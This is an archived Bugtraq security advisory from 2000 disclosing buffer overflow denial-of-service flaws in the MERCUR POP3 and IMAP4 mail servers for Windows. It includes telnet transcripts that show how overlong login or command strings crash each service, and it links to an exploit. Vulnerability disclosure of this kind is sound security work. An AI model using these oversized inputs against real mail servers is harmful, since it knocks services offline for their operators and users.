[14285] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

Local / Remote Multiples Remote DoS Attacks in MERCUR v3.2* for

daemon@ATHENA.MIT.EDU (Ussr Labs)
Tue Mar 14 23:27:11 2000

Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Message-Id:  <NCBBKFKDOLAGKIAPMILPKEPNCCAA.labs@ussrback.com>
Date:         Tue, 14 Mar 2000 04:12:24 -0300
Reply-To: Ussr Labs <labs@USSRBACK.COM>
From: Ussr Labs <labs@USSRBACK.COM>
X-To:         BUGTRAQ <bugtraq@securityfocus.com>
To: BUGTRAQ@SECURITYFOCUS.COM

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Local / Remote Multiples Remote DoS Attacks in MERCUR v3.2* for
Windows 98/NT Vulnerability

USSR Advisory Code:   USSR-2000035

Release Date:
March 15, 2000

Systems Affected:
MERCUR Mailserver 3.2
MERCUR POP3-Server (v3.20.01) for  Windows 98/NT
MERCUR IMAP4-Server (v3.20.01) for Windows 98/NT

THE PROBLEM

UssrLabs found multiple places in MERCUR v3.20.* where they do not
use proper bounds checking.
The following all result in a Denial of Service against the service
in question.

Example:
[hellme@die-communitech.net$ telnet example.com 110
Trying example.com...
Connected to example.com.
Escape character is '^]'.
+OK MERCUR POP3-Server (v3.20.01 Unregistered) for Windows NT ready
at Tue, 14 M
ar 2000  03:30:39 -0300
user (buffer)

Where [buffer] is  aprox. 2000 characters.

[hellme@die-communitech.net$ telnet example.com 143
Trying example.com...
Connected to example.com.
Escape character is '^]'.
* OK MERCUR IMAP4-Server (v3.20.01 Unregistered) for Windows NT ready
at Tue, 14
 Mar 2000  03:34:09 -0300
(buffer)

Where [buffer] is aprox. 3000 characters.

Binary or source for this Exploit:

http://www.ussrback.com/

Exploit:
the Exploit, crash the remote machine service pop3 and imap

Vendor Status:
informed

Vendor   Url: http://www.atrium-software.com
Program Url: http://www.atrium-software.com/mercur/mercur_e.html

Credit: USSRLABS

SOLUTION
Noting yet.

Greetings:
Eeye, Attrition, w00w00, beavuh, Rhino9, ADM, HNN, Technotronic and
Wiretrip.

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 6.5.2 for non-commercial use <http://www.pgp.com>

iQA/AwUBOM3mWKVRYEYcg938EQIXsQCgmHUTL47TZHT77Z2jBi6G4kEQx/8AoPV3
p8SaqmGK9Dls6ujMJucLz4vq
=CUnk
-----END PGP SIGNATURE-----


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[14285] in bugtraq

Local / Remote Multiples Remote DoS Attacks in MERCUR v3.2* for

daemon@ATHENA.MIT.EDU (Ussr Labs)Tue Mar 14 23:27:11 2000

daemon@ATHENA.MIT.EDU (Ussr Labs)
Tue Mar 14 23:27:11 2000